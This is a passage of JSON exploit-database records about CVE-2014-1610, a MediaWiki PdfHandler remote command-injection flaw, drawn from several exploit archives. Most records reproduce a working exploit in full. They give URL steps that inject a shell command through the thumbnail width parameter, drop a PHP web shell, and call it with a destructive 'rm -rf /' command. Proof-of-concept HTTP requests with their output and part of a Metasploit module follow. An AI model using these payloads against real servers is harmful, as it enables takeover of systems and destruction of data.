value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n \r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n \r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n \r\n ''\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/21922", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T11:12:53", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21845", "href": "https://0day.today/exploit/description/21845", "sourceData": "####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n \r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21845", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T05:24:21", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21844", "href": "https://0day.today/exploit/description/21844", "sourceData": "# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\r\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\r\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\r\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\r\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\r\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\r\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\r\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\r\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\r\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\r\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\r\n2LmeyQR2rzjBB7Sovvcn\r\n=ooEs\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/21844", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMediaWiki 1.22.1 PdfHandler - Remote Code Execution", "edition": 2, "cvss3": {}, "published": "2014-02-01T00:00:00", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EXPLOITPACK:740983D0417678074247C5AE47DBBED6", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n####################################################################\n#\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\n# Affected website : Wikipedia.org and more !\n#\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\n# Release dates : Feb 1, 2014\n# Special Thanks to 2600 Thailand !\n#\n####################################################################\n\n# Exploit:\n####################################################################\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\nhttp://vulnerable-site/index.php/Special:Upload\n2. inject os cmd to upload a php-backdoor\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\n3. access to php-backdoor!\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\n4. happy pwning!!\n\n\n# Related files:\n####################################################################\nthumb.php <-- extract all _GET array to params\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\noptions\n/includes/media/ImageHandler.php\n/includes/GlobalFunctions.php\n/includes/filerepo/file/File.php\n\n# Vulnerability Analysis:\n####################################################################\n1. thumb.php\nThis script used to resize images if it is configured to be done\nwhen the web browser requests the image\n<? ...\n1.1 Called directly, use $_GET params\nwfThumbHandleRequest();\n1.2 Handle a thumbnail request via query parameters\nfunction wfThumbHandleRequest() {\n$params = get_magic_quotes_gpc()\n? array_map( 'stripslashes', $_GET )\n: $_GET; << WTF\n\nwfStreamThumb( $params ); // stream the thumbnail\n}\n1.3 Stream a thumbnail specified by parameters\nfunction wfStreamThumb( array $params ) {\n...\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\nuploaded.pdf file here\n...\n// Backwards compatibility parameters\nif ( isset( $params['w'] ) ) {\n$params['width'] = $params['w']; // << Inject os cmd here!\nunset( $params['w'] );\n}\n...\n$img = wfLocalFile( $fileName );\n...\n// Thumbnail isn't already there, so create the new thumbnail...\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\nby width/height\n...\n// Stream the file if there were no errors\n$thumb->streamFile( $headers );\n...\n?>\n2. /includes/filerepo/file/File.php\n<? ...\nfunction transform( $params, $flags = 0 ) { ...\n$handler = $this->getHandler(); // << PDF Handler\n...\n$normalisedParams = $params;\n$handler->normaliseParams( $this, $normalisedParams );\n...\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\n..\n?>\n3. /extensions/PdfHandler/PdfHandler_body.php\n<? ...\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\n...\n$width = $params['width'];\n...\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\nparameters\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\n-dLastPage={$page}\";\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\n$srcPath );\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\nargument\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\n$cmd .= \" 2>&1\";\n...\n$err = wfShellExec( $cmd, $retval );\n...\n?>\n4. /includes/GlobalFunctions.php\nExecute a shell command, with time and memory limits\n<? ...\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\narray() ) {\n...\npassthru( $cmd, $retval ); // << Execute here!!\n\n# Proof-Of-Concept\n####################################################################\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\nHTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\n\n<html><head><title>Error generating thumbnail</title></head>\n<body>\n<h1>Error generating thumbnail</h1>\n<p>\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\nconvert: option requires an argument `-resize' @\nerror/convert.c/ConvertImageCommand/2380.<br />\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\n\n</p>\n\n</body>\n</html>\n\n\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n\n# Back-end $cmd\n####################################################################\nGlobalFunctions.php : wfShellExec()\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.14 (GNU/Linux)\n\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\n2LmeyQR2rzjBB7Sovvcn\n=ooEs\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "MediaWiki contains a flaw that is due to the program failing to properly sanitize input passed via the \"page\" parameter in the thumb.php script. This may allow a remote attack to inject arbitrary shell commands.\n\nVulnerability Type: Remote Command Execution", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "dsquare", "title": "MediaWiki thumb.php page Parameter Remote Shell Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2013-04-02T00:00:00", "id": "E-382", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T14:53:18", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "MediaWiki Thumb.php - Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85082", "id": "SSV:85082", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\r\\n",\r\n 'PrependEncoder' => "php -r \\"",\r\n 'AppendEncoder' => "\\""\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),\r\n OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),\r\n OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status("No META Generator tag on #{full_uri}.")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status("#{meta_generator} detected.")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if 